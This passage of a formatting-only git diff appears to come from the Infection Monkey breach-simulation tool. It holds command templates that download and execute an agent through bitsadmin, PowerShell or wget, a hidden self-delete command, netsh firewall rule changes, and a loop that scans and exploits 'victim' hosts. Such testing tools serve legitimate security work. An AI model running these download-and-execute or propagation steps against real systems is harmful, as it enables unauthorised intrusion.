-MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,) -GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' -DROPPER_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,) -MONKEY_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,) -MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' \ - '&cmd /c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,) -DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & ' \ - 'if not exist %(file_path)s exit)) > NUL 2>&1 ' +DROPPER_CMDLINE_WINDOWS = "%s %%(dropper_path)s %s" % ( + CMD_PREFIX, + DROPPER_ARG, +) +MONKEY_CMDLINE_WINDOWS = "%s %%(monkey_path)s %s" % ( + CMD_PREFIX, + MONKEY_ARG, +) +MONKEY_CMDLINE_LINUX = "./%%(monkey_filename)s %s" % (MONKEY_ARG,) +GENERAL_CMDLINE_LINUX = "(cd %(monkey_directory)s && %(monkey_commandline)s)" +DROPPER_CMDLINE_DETACHED_WINDOWS = "%s start cmd /c %%(dropper_path)s %s" % ( + CMD_PREFIX, + DROPPER_ARG, +) +MONKEY_CMDLINE_DETACHED_WINDOWS = "%s start cmd /c %%(monkey_path)s %s" % ( + CMD_PREFIX, + MONKEY_ARG, +) +MONKEY_CMDLINE_HTTP = ( + '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' + '&cmd /c %%(monkey_path)s %s"' + % ( + CMD_PREFIX, + MONKEY_ARG, + ) +) +DELAY_DELETE_CMD = ( + "cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & " + "if not exist %(file_path)s exit)) > NUL 2>&1 " +) # Commands used for downloading monkeys -POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \ - "monkey_path)s\' -UseBasicParsing\" " +POWERSHELL_HTTP_UPLOAD = ( + "powershell -NoLogo -Command \"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(" + "monkey_path)s' -UseBasicParsing\" " +) WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s" -BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' +BITSADMIN_CMDLINE_HTTP = ( + "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s" +) CHMOD_MONKEY = "chmod +x %(monkey_path)s" RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s" # Commands used to check for architecture and if machine is exploitable @@ -33,13 +57,17 @@ GET_ARCH_WINDOWS = "wmic os get osarchitecture" GET_ARCH_LINUX = "lscpu" # All in one commands (upload, change permissions, run) -HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \ - "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ - " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ - "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" -HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \ - "&& wget -O %(monkey_path)s %(http_path)s " \ - "; chmod +x %(monkey_path)s " \ - "&& %(monkey_path)s %(monkey_type)s %(parameters)s" +HADOOP_WINDOWS_COMMAND = ( + "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " + "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " + " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " + '{& %(monkey_path)s %(monkey_type)s %(parameters)s } "' +) +HADOOP_LINUX_COMMAND = ( + "! [ -f %(monkey_path)s ] " + "&& wget -O %(monkey_path)s %(http_path)s " + "; chmod +x %(monkey_path)s " + "&& %(monkey_path)s %(monkey_type)s %(parameters)s" +) DOWNLOAD_TIMEOUT = 180 diff --git a/monkey/infection_monkey/model/host.py b/monkey/infection_monkey/model/host.py index d71446108..68b903d71 100644 --- a/monkey/infection_monkey/model/host.py +++ b/monkey/infection_monkey/model/host.py @@ -1,8 +1,8 @@ -__author__ = 'itamar' +__author__ = "itamar" class VictimHost(object): - def __init__(self, ip_addr, domain_name=''): + def __init__(self, ip_addr, domain_name=""): self.ip_addr = ip_addr self.domain_name = str(domain_name) self.os = {} @@ -41,7 +41,7 @@ class VictimHost(object): victim += "] Services - [" for k, v in list(self.services.items()): victim += "%s-%s " % (k, v) - victim += '] ICMP: %s ' % (self.icmp) + victim += "] ICMP: %s " % (self.icmp) victim += "target monkey: %s" % self.monkey_exe return victim diff --git a/monkey/infection_monkey/model/victim_host_generator.py b/monkey/infection_monkey/model/victim_host_generator.py index 1e9eba9c2..444c4a5ee 100644 --- a/monkey/infection_monkey/model/victim_host_generator.py +++ b/monkey/infection_monkey/model/victim_host_generator.py @@ -31,7 +31,7 @@ class VictimHostGenerator(object): for address in net_range: if not self.is_ip_scannable(address): # check if the IP should be skipped continue - if hasattr(net_range, 'domain_name'): + if hasattr(net_range, "domain_name"): victim = VictimHost(address, net_range.domain_name) else: victim = VictimHost(address) diff --git a/monkey/infection_monkey/model/victim_host_generator_test.py b/monkey/infection_monkey/model/victim_host_generator_test.py index 5511680d7..26ca99352 100644 --- a/monkey/infection_monkey/model/victim_host_generator_test.py +++ b/monkey/infection_monkey/model/victim_host_generator_test.py @@ -5,17 +5,16 @@ from infection_monkey.model.victim_host_generator import VictimHostGenerator class VictimHostGeneratorTester(TestCase): - def setUp(self): self.cidr_range = CidrRange("10.0.0.0/28", False) # this gives us 15 hosts - self.local_host_range = SingleIpRange('localhost') - self.random_single_ip_range = SingleIpRange('41.50.13.37') + self.local_host_range = SingleIpRange("localhost") + self.random_single_ip_range = SingleIpRange("41.50.13.37") def test_chunking(self): chunk_size = 3 # current test setup is 15+1+1-1 hosts test_ranges = [self.cidr_range, self.local_host_range, self.random_single_ip_range] - generator = VictimHostGenerator(test_ranges, '10.0.0.1', []) + generator = VictimHostGenerator(test_ranges, "10.0.0.1", []) victims = generator.generate_victims(chunk_size) for i in range(5): # quickly check the equally sided chunks self.assertEqual(len(next(victims)), chunk_size) @@ -23,14 +22,14 @@ class VictimHostGeneratorTester(TestCase): self.assertEqual(len(victim_chunk_last), 1) def test_remove_blocked_ip(self): - generator = VictimHostGenerator(self.cidr_range, ['10.0.0.1'], []) + generator = VictimHostGenerator(self.cidr_range, ["10.0.0.1"], []) victims = list(generator.generate_victims_from_range(self.cidr_range)) self.assertEqual(len(victims), 14) # 15 minus the 1 we blocked def test_remove_local_ips(self): generator = VictimHostGenerator([], [], []) - generator.local_addresses = ['127.0.0.1'] + generator.local_addresses = ["127.0.0.1"] victims = list(generator.generate_victims_from_range(self.local_host_range)) self.assertEqual(len(victims), 0) # block the local IP @@ -39,9 +38,9 @@ class VictimHostGeneratorTester(TestCase): generator = VictimHostGenerator([], [], []) # dummy object victims = list(generator.generate_victims_from_range(self.local_host_range)) self.assertEqual(len(victims), 1) - self.assertEqual(victims[0].domain_name, 'localhost') + self.assertEqual(victims[0].domain_name, "localhost") # don't generate for other victims victims = list(generator.generate_victims_from_range(self.random_single_ip_range)) self.assertEqual(len(victims), 1) - self.assertEqual(victims[0].domain_name, '') + self.assertEqual(victims[0].domain_name, "") diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3a5c5619f..d1871da22 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -32,13 +32,17 @@ from infection_monkey.telemetry.trace_telem import TraceTelem from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.utils.environment import is_windows_os from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException -from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir +from infection_monkey.utils.monkey_dir import ( + create_monkey_dir, + get_monkey_dir_path, + remove_monkey_dir, +) from infection_monkey.utils.monkey_log_path import get_monkey_log_path from infection_monkey.windows_upgrader import WindowsUpgrader MAX_DEPTH_REACHED_MESSAGE = "Reached max depth, shutting down" -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -69,11 +73,11 @@ class InfectionMonkey(object): raise Exception("Another instance of the monkey is already running") arg_parser = argparse.ArgumentParser() - arg_parser.add_argument('-p', '--parent') - arg_parser.add_argument('-t', '--tunnel') - arg_parser.add_argument('-s', '--server') - arg_parser.add_argument('-d', '--depth', type=int) - arg_parser.add_argument('-vp', '--vulnerable-port') + arg_parser.add_argument("-p", "--parent") + arg_parser.add_argument("-t", "--tunnel") + arg_parser.add_argument("-s", "--server") + arg_parser.add_argument("-d", "--depth", type=int) + arg_parser.add_argument("-vp", "--vulnerable-port") self._opts, self._args = arg_parser.parse_known_args(self._args) self.log_arguments() @@ -96,7 +100,9 @@ class InfectionMonkey(object): LOG.debug("Added default server: %s" % self._default_server) WormConfiguration.command_servers.insert(0, self._default_server) else: - LOG.debug("Default server: %s is already in command servers list" % self._default_server) + LOG.debug( + "Default server: %s is already in command servers list" % self._default_server + ) def start(self): try: @@ -155,8 +161,10 @@ class InfectionMonkey(object): if not self._keep_running or not WormConfiguration.alive: break - machines = self._network.get_victim_machines(max_find=WormConfiguration.victims_max_find, - stop_callback=ControlClient.check_for_stop) + machines = self._network.get_victim_machines( + max_find=WormConfiguration.victims_max_find, + stop_callback=ControlClient.check_for_stop, + ) is_empty = True for machine in machines: if ControlClient.check_for_stop(): @@ -164,20 +172,25 @@ class InfectionMonkey(object): is_empty = False for finger in self._fingerprint: - LOG.info("Trying to get OS fingerprint from %r with module %s", - machine, finger.__class__.__name__) + LOG.info( + "Trying to get OS fingerprint from %r with module %s", + machine, + finger.__class__.__name__, + ) try: finger.get_host_fingerprint(machine) except BaseException as exc: - LOG.error("Failed to run fingerprinter %s, exception %s" % finger.__class__.__name__, - str(exc)) + LOG.error( + "Failed to run fingerprinter %s, exception %s" + % finger.__class__.__name__, + str(exc), + ) ScanTelem(machine).send() # skip machines that we've already exploited if machine in self._exploited_machines: - LOG.debug("Skipping %r - already exploited", - machine) + LOG.debug("Skipping %r - already exploited", machine) continue elif machine in self._fail_exploitation_machines: if WormConfiguration.retry_failed_explotation: @@ -190,25 +203,35 @@ class InfectionMonkey(object): monkey_tunnel.set_tunnel_for_host(machine) if self._default_server: if self._network.on_island(self._default_server): - machine.set_default_server(get_interface_to_target(machine.ip_addr) + - (':' + self._default_server_port - if self._default_server_port else '')) + machine.set_default_server( + get_interface_to_target(machine.ip_addr) + + ( + ":" + self._default_server_port + if self._default_server_port + else "" + ) + ) else: machine.set_default_server(self._default_server) - LOG.debug("Default server for machine: %r set to %s" % (machine, machine.default_server)) + LOG.debug( + "Default server for machine: %r set to %s" + % (machine, machine.default_server) + ) # Order exploits according to their type - self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value) + self._exploiters = sorted( + self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value + ) host_exploited = False for exploiter in [exploiter(machine) for exploiter in self._exploiters]: if self.try_exploiting(machine, exploiter): host_exploited = True - VictimHostTelem('T1210', ScanStatus.USED, machine=machine).send() + VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send() if exploiter.RUNS_AGENT_ON_SUCCESS: break # if adding machine to exploited, won't try other exploits on it if not host_exploited: self._fail_exploitation_machines.add(machine) - VictimHostTelem('T1210', ScanStatus.SCANNED, machine=machine).send() + VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send() if not self._keep_running: break @@ -226,7 +249,9 @@ class InfectionMonkey(object): # connect to the tunnel if len(self._exploited_machines) > 0: time_to_sleep = WormConfiguration.keep_tunnel_open_time - LOG.info("Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep) + LOG.info( + "Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep + ) time.sleep(time_to_sleep) if monkey_tunnel: @@ -236,7 +261,9 @@ class InfectionMonkey(object): post_breach_phase.join() except PlannedShutdownException: - LOG.info("A planned shutdown of the Monkey occurred. Logging the reason and finishing execution.") + LOG.info( + "A planned shutdown of the Monkey occurred. Logging the reason and finishing execution." + ) LOG.exception("Planned shutdown, reason:") def start_post_breach_phase(self): @@ -279,7 +306,9 @@ class InfectionMonkey(object): InfectionMonkey.close_tunnel() firewall.close() else: - StateTelem(is_done=True, version=get_version()).send() # Signal the server (before closing the tunnel) + StateTelem( + is_done=True, version=get_version() + ).send() # Signal the server (before closing the tunnel) InfectionMonkey.close_tunnel() firewall.close() if WormConfiguration.send_log_to_server: @@ -291,7 +320,9 @@ class InfectionMonkey(object): @staticmethod def close_tunnel(): - tunnel_address = ControlClient.proxies.get('https', '').replace('https://', '').split(':')[0] + tunnel_address = ( + ControlClient.proxies.get("https", "").replace("https://", "").split(":")[0] + ) if tunnel_address: LOG.info("Quitting tunnel %s", tunnel_address) tunnel.quit_tunnel(tunnel_address) @@ -301,18 +332,23 @@ class InfectionMonkey(object): status = ScanStatus.USED if remove_monkey_dir() else ScanStatus.SCANNED T1107Telem(status, get_monkey_dir_path()).send() - if WormConfiguration.self_delete_in_cleanup \ - and -1 == sys.executable.find('python'): + if WormConfiguration.self_delete_in_cleanup and -1 == sys.executable.find("python"): try: status = None if "win32" == sys.platform: from subprocess import CREATE_NEW_CONSOLE, STARTF_USESHOWWINDOW, SW_HIDE + startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW startupinfo.wShowWindow = SW_HIDE - subprocess.Popen(DELAY_DELETE_CMD % {'file_path': sys.executable}, - stdin=None, stdout=None, stderr=None, - close_fds=True, startupinfo=startupinfo) + subprocess.Popen( + DELAY_DELETE_CMD % {"file_path": sys.executable}, + stdin=None, + stdout=None, + stderr=None, + close_fds=True, + startupinfo=startupinfo, + ) else: os.remove(sys.executable) status = ScanStatus.USED @@ -325,10 +361,10 @@ class InfectionMonkey(object): def send_log(self): monkey_log_path = get_monkey_log_path() if os.path.exists(monkey_log_path): - with open(monkey_log_path, 'r') as f: + with open(monkey_log_path, "r") as f: log = f.read() else: - log = '' + log = "" ControlClient.send_log(log) @@ -340,8 +376,12 @@ class InfectionMonkey(object): :return: True if successfully exploited, False otherwise """ if not exploiter.is_os_supported(): - LOG.info("Skipping exploiter %s host:%r, os %s is not supported", - exploiter.__class__.__name__, machine, machine.os) + LOG.info( + "Skipping exploiter %s host:%r, os %s is not supported", + exploiter.__class__.__name__, + machine, + machine.os, + ) return False LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__) @@ -353,17 +393,32 @@ class InfectionMonkey(object): self.successfully_exploited(machine, exploiter, exploiter.RUNS_AGENT_ON_SUCCESS) return True else: - LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__) + LOG.info( + "Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__ + ) except ExploitingVulnerableMachineError as exc: - LOG.error("Exception while attacking %s using %s: %s", - machine, exploiter.__class__.__name__, exc) + LOG.error( + "Exception while attacking %s using %s: %s", + machine, + exploiter.__class__.__name__, + exc, + ) self.successfully_exploited(machine, exploiter, exploiter.RUNS_AGENT_ON_SUCCESS) return True except FailedExploitationError as e: - LOG.info("Failed exploiting %r with exploiter %s, %s", machine, exploiter.__class__.__name__, e) + LOG.info( + "Failed exploiting %r with exploiter %s, %s", + machine, + exploiter.__class__.__name__, + e, + ) except Exception as exc: - LOG.exception("Exception while attacking %s using %s: %s", - machine, exploiter.__class__.__name__, exc) + LOG.exception( + "Exception while attacking %s using %s: %s", + machine, + exploiter.__class__.__name__, + exc, + ) finally: exploiter.send_exploit_telemetry(result) return False @@ -377,8 +432,7 @@ class InfectionMonkey(object): if RUNS_AGENT_ON_SUCCESS: self._exploited_machines.add(machine) - LOG.info("Successfully propagated to %s using %s", - machine, exploiter.__class__.__name__) + LOG.info("Successfully propagated to %s using %s", machine, exploiter.__class__.__name__) # check if max-exploitation limit is reached if WormConfiguration.victims_max_exploit <= len(self._exploited_machines): @@ -388,9 +442,9 @@ class InfectionMonkey(object): def set_default_port(self): try: - self._default_server_port = self._default_server.split(':')[1] + self._default_server_port = self._default_server.split(":")[1] except KeyError: - self._default_server_port = '' + self._default_server_port = "" def set_default_server(self): """ @@ -399,7 +453,8 @@ class InfectionMonkey(object): """ if not ControlClient.find_server(default_tunnel=self._default_tunnel): raise PlannedShutdownException( - "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)) + "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel) + ) self._default_server = WormConfiguration.current_server LOG.debug("default server set to: %s" % self._default_server) diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index 2d14156b3..31b2e6007 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -1,9 +1,9 @@ import os from io import BytesIO -__author__ = 'hoffer' +__author__ = "hoffer" -MONKEYFS_PREFIX = 'monkeyfs://' +MONKEYFS_PREFIX = "monkeyfs://" open_orig = open @@ -11,7 +11,7 @@ open_orig = open class VirtualFile(BytesIO): _vfs = {} # virtual File-System - def __init__(self, name, mode='r', buffering=None): + def __init__(self, name, mode="r", buffering=None): if not name.startswith(MONKEYFS_PREFIX): name = MONKEYFS_PREFIX + name self.name = name @@ -53,7 +53,7 @@ def virtual_path(name): # noinspection PyShadowingBuiltins -def open(name, mode='r', buffering=-1): +def open(name, mode="r", buffering=-1): # use normal open for regular paths, and our "virtual" open for monkeyfs:// paths if name.startswith(MONKEYFS_PREFIX): return VirtualFile(name, mode, buffering) diff --git a/monkey/infection_monkey/network/HostFinger.py b/monkey/infection_monkey/network/HostFinger.py index b48c01111..0ff0cb8e0 100644 --- a/monkey/infection_monkey/network/HostFinger.py +++ b/monkey/infection_monkey/network/HostFinger.py @@ -21,8 +21,8 @@ class HostFinger(Plugin): def init_service(self, services, service_key, port): services[service_key] = {} - services[service_key]['display_name'] = self._SCANNED_SERVICE - services[service_key]['port'] = port + services[service_key]["display_name"] = self._SCANNED_SERVICE + services[service_key]["port"] = port @abstractmethod def get_host_fingerprint(self, host): diff --git a/monkey/infection_monkey/network/__init__.py b/monkey/infection_monkey/network/__init__.py index 05a457b0c..9d0748729 100644 --- a/monkey/infection_monkey/network/__init__.py +++ b/monkey/infection_monkey/network/__init__.py @@ -1 +1 @@ -__author__ = 'itamar' +__author__ = "itamar" diff --git a/monkey/infection_monkey/network/elasticfinger.py b/monkey/infection_monkey/network/elasticfinger.py index e7a60be17..e7e2518b6 100644 --- a/monkey/infection_monkey/network/elasticfinger.py +++ b/monkey/infection_monkey/network/elasticfinger.py @@ -12,14 +12,15 @@ from infection_monkey.network.HostFinger import HostFinger ES_PORT = 9200 ES_HTTP_TIMEOUT = 5 LOG = logging.getLogger(__name__) -__author__ = 'danielg' +__author__ = "danielg" class ElasticFinger(HostFinger): """ - Fingerprints elastic search clusters, only on port 9200 + Fingerprints elastic search clusters, only on port 9200 """ - _SCANNED_SERVICE = 'Elastic search' + + _SCANNED_SERVICE = "Elastic search" def __init__(self): self._config = infection_monkey.config.WormConfiguration @@ -31,13 +32,13 @@ class ElasticFinger(HostFinger): :return: Success/failure, data is saved in the host struct """ try: - url = 'http://%s:%s/' % (host.ip_addr, ES_PORT) + url = "http://%s:%s/" % (host.ip_addr, ES_PORT) with closing(requests.get(url, timeout=ES_HTTP_TIMEOUT)) as req: data = json.loads(req.text) self.init_service(host.services, ES_SERVICE, ES_PORT) - host.services[ES_SERVICE]['cluster_name'] = data['cluster_name'] - host.services[ES_SERVICE]['name'] = data['name'] - host.services[ES_SERVICE]['version'] = data['version']['number'] + host.services[ES_SERVICE]["cluster_name"] = data["cluster_name"] + host.services[ES_SERVICE]["name"] = data["name"] + host.services[ES_SERVICE]["version"] = data["version"]["number"] return True except Timeout: LOG.debug("Got timeout while trying to read header information") diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index f66bea7f4..cddba49fe 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -4,9 +4,15 @@ import sys def _run_netsh_cmd(command, args): - cmd = subprocess.Popen("netsh %s %s" % (command, " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) - if value])), stdout=subprocess.PIPE) - return cmd.stdout.read().strip().lower().endswith('ok.') + cmd = subprocess.Popen( + "netsh %s %s" + % ( + command, + " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) if value]), + ), + stdout=subprocess.PIPE, + ) + return cmd.stdout.read().strip().lower().endswith("ok.") class FirewallApp(object): @@ -38,25 +44,24 @@ class WinAdvFirewall(FirewallApp): def is_enabled(self): try: - cmd = subprocess.Popen('netsh advfirewall show currentprofile', stdout=subprocess.PIPE) + cmd = subprocess.Popen("netsh advfirewall show currentprofile", stdout=subprocess.PIPE) out = cmd.stdout.readlines() for line in out: - if line.startswith('State'): + if line.startswith("State"): state = line.split()[-1].strip() return state == "ON" except Exception: return None - def add_firewall_rule(self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs): - netsh_args = {'name': name, - 'dir': direction, - 'action': action, - 'program': program} + def add_firewall_rule( + self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs + ): + netsh_args = {"name": name, "dir": direction, "action": action, "program": program} netsh_args.update(kwargs) try: - if _run_netsh_cmd('advfirewall firewall add rule', netsh_args): + if _run_netsh_cmd("advfirewall firewall add rule", netsh_args): self._rules[name] = netsh_args return True else: @@ -65,11 +70,11 @@ class WinAdvFirewall(FirewallApp): return None def remove_firewall_rule(self, name="Firewall", **kwargs): - netsh_args = {'name': name} + netsh_args = {"name": name} netsh_args.update(kwargs) try: - if _run_netsh_cmd('advfirewall firewall delete rule', netsh_args): + if _run_netsh_cmd("advfirewall firewall delete rule", netsh_args): if name in self._rules: del self._rules[name] return True @@ -83,10 +88,12 @@ class WinAdvFirewall(FirewallApp): return True for rule in list(self._rules.values()): - if rule.get('program') == sys.executable and \ - 'in' == rule.get('dir') and \ - 'allow' == rule.get('action') and \ - 4 == len(list(rule.keys())): + if ( + rule.get("program") == sys.executable + and "in" == rule.get("dir") + and "allow" == rule.get("action") + and 4 == len(list(rule.keys())) + ): return True return False @@ -104,29 +111,33 @@ class WinFirewall(FirewallApp): def is_enabled(self): try: - cmd = subprocess.Popen('netsh firewall show state', stdout=subprocess.PIPE) + cmd = subprocess.Popen("netsh firewall show state", stdout=subprocess.PIPE) out = cmd.stdout.readlines() for line in out: - if line.startswith('Operational mode'): - state = line.split('=')[-1].strip() - elif line.startswith('The service has not been started.'): + if line.startswith("Operational mode"): + state = line.split("=")[-1].strip() + elif line.startswith("The service has not been started."): return False return state == "Enable" except Exception: return None - def add_firewall_rule(self, rule='allowedprogram', name="Firewall", mode="ENABLE", program=sys.executable, - **kwargs): - netsh_args = {'name': name, - 'mode': mode, - 'program': program} + def add_firewall_rule( + self, + rule="allowedprogram", + name="Firewall", + mode="ENABLE", + program=sys.executable, + **kwargs, + ): + netsh_args = {"name": name, "mode": mode, "program": program} netsh_args.update(kwargs) try: - if _run_netsh_cmd('firewall add %s' % rule, netsh_args): - netsh_args['rule'] = rule + if _run_netsh_cmd("firewall add %s" % rule, netsh_args): + netsh_args["rule"] = rule self._rules[name] = netsh_args return True else: @@ -134,12 +145,18 @@ class WinFirewall(FirewallApp): except Exception: return None - def remove_firewall_rule(self, rule='allowedprogram', name="Firewall", mode="ENABLE", program=sys.executable, - **kwargs): - netsh_args = {'program': program} + def remove_firewall_rule( + self, + rule="allowedprogram", + name="Firewall", + mode="ENABLE", + program=sys.executable, + **kwargs, + ): + netsh_args = {"program": program} netsh_args.update(kwargs) try: - if _run_netsh_cmd('firewall delete %s' % rule, netsh_args): + if _run_netsh_cmd("firewall delete %s" % rule, netsh_args): if name in self._rules: del self._rules[name] return True @@ -153,7 +170,7 @@ class WinFirewall(FirewallApp): return True for rule in list(self._rules.values()): - if rule.get('program') == sys.executable and 'ENABLE' == rule.get('mode'): + if rule.get("program") == sys.executable and "ENABLE" == rule.get("mode"): return True return False @@ -167,7 +184,7 @@ class WinFirewall(FirewallApp): if sys.platform == "win32": try: - win_ver = int(platform.version().split('.')[0]) + win_ver = int(platform.version().split(".")[0]) except Exception: win_ver = 0 if win_ver > 5: diff --git a/monkey/infection_monkey/network/httpfinger.py b/monkey/infection_monkey/network/httpfinger.py index 86c48cbde..8fa6071e7 100644 --- a/monkey/infection_monkey/network/httpfinger.py +++ b/monkey/infection_monkey/network/httpfinger.py @@ -10,7 +10,8 @@ class HTTPFinger(HostFinger): """ Goal is to recognise HTTP servers, where what we currently care about is apache. """ - _SCANNED_SERVICE = 'HTTP' + + _SCANNED_SERVICE = "HTTP" def __init__(self): self._config = infection_monkey.config.WormConfiguration @@ -35,11 +36,11 @@ class HTTPFinger(HostFinger): for url in (https, http): # start with https and downgrade try: with closing(head(url, verify=False, timeout=1)) as req: # noqa: DUO123 - server = req.headers.get('Server') - ssl = True if 'https://' in url else False - self.init_service(host.services, ('tcp-' + port[1]), port[0]) - host.services['tcp-' + port[1]]['name'] = 'http' - host.services['tcp-' + port[1]]['data'] = (server, ssl) + server = req.headers.get("Server") + ssl = True if "https://" in url else False + self.init_service(host.services, ("tcp-" + port[1]), port[0]) + host.services["tcp-" + port[1]]["name"] = "http" + host.services["tcp-" + port[1]]["data"] = (server, ssl) LOG.info("Port %d is open on host %s " % (port[0], host)) break # https will be the same on the same port except Timeout: diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 22de0eebb..21adae9f8 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -16,7 +16,7 @@ from infection_monkey.utils.environment import is_windows_os TIMEOUT = 15 LOOPBACK_NAME = b"lo" SIOCGIFADDR = 0x8915 # get PA address -SIOCGIFNETMASK = 0x891b # get network PA mask +SIOCGIFNETMASK = 0x891B # get network PA mask RTF_UP = 0x0001 # Route usable RTF_REJECT = 0x0200 @@ -27,36 +27,40 @@ def get_host_subnets(): Each subnet item contains the host IP in that network + the subnet. :return: List of dict, keys are "addr" and "subnet" """ - ipv4_nets = [netifaces.ifaddresses(interface)[netifaces.AF_INET] - for interface in netifaces.interfaces() - if netifaces.AF_INET in netifaces.ifaddresses(interface) - ] + ipv4_nets = [ + netifaces.ifaddresses(interface)[netifaces.AF_INET] + for interface in netifaces.interfaces() + if netifaces.AF_INET in netifaces.ifaddresses(interface) + ] # flatten ipv4_nets = itertools.chain.from_iterable(ipv4_nets) # remove loopback - ipv4_nets = [network for network in ipv4_nets if network['addr'] != '127.0.0.1'] + ipv4_nets = [network for network in ipv4_nets if network["addr"] != "127.0.0.1"] # remove auto conf - ipv4_nets = [network for network in ipv4_nets if not network['addr'].startswith('169.254')] + ipv4_nets = [network for network in ipv4_nets if not network["addr"].startswith("169.254")] for network in ipv4_nets: - if 'broadcast' in network: - network.pop('broadcast') + if "broadcast" in network: + network.pop("broadcast") for attr in network: network[attr] = network[attr] return ipv4_nets if is_windows_os(): + def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] def get_routes(): raise NotImplementedError() + + else: from fcntl import ioctl def local_ips(): - valid_ips = [network['addr'] for network in get_host_subnets()] + valid_ips = [network["addr"] for network in get_host_subnets()] return valid_ips def get_routes(): # based on scapy implementation for route parsing @@ -92,10 +96,15 @@ else: ifaddr = socket.inet_ntoa(ifreq[20:24]) else: continue - routes.append((socket.htonl(int(dst, 16)) & 0xffffffff, - socket.htonl(int(msk, 16)) & 0xffffffff, - socket.inet_ntoa(struct.pack("I", int(gw, 16))), - iff, ifaddr)) + routes.append( + ( + socket.htonl(int(dst, 16)) & 0xFFFFFFFF, + socket.htonl(int(msk, 16)) & 0xFFFFFFFF, + socket.inet_ntoa(struct.pack("I", int(gw, 16))), + iff, + ifaddr, + ) + ) f.close() return routes @@ -142,23 +151,27 @@ def get_interfaces_ranges(): res = [] ifs = get_host_subnets() for net_interface in ifs: - address_str = net_interface['addr'] - netmask_str = net_interface['netmask'] + address_str = net_interface["addr"] + netmask_str = net_interface["netmask"] # limit subnet scans to class C only res.append(CidrRange(cidr_range="%s/%s" % (address_str, netmask_str))) return res if is_windows_os(): + def get_ip_for_connection(target_ip): return None + + else: + def get_ip_for_connection(target_ip): try: - query_str = 'ip route get %s' % target_ip + query_str = "ip route get %s" % target_ip resp = check_output(query_str.split()) substr = resp.split() - src = substr[substr.index('src') + 1] + src = substr[substr.index("src") + 1] return src except Exception: return None diff --git a/monkey/infection_monkey/network/mssql_fingerprint.py b/monkey/infection_monkey/network/mssql_fingerprint.py index 8d934677e..3113d278f 100644 --- a/monkey/infection_monkey/network/mssql_fingerprint.py +++ b/monkey/infection_monkey/network/mssql_fingerprint.py @@ -5,7 +5,7 @@ import socket import infection_monkey.config from infection_monkey.network.HostFinger import HostFinger -__author__ = 'Maor Rayzin' +__author__ = "Maor Rayzin" LOG = logging.getLogger(__name__) @@ -15,19 +15,19 @@ class MSSQLFinger(HostFinger): SQL_BROWSER_DEFAULT_PORT = 1434 BUFFER_SIZE = 4096 TIMEOUT = 5 - _SCANNED_SERVICE = 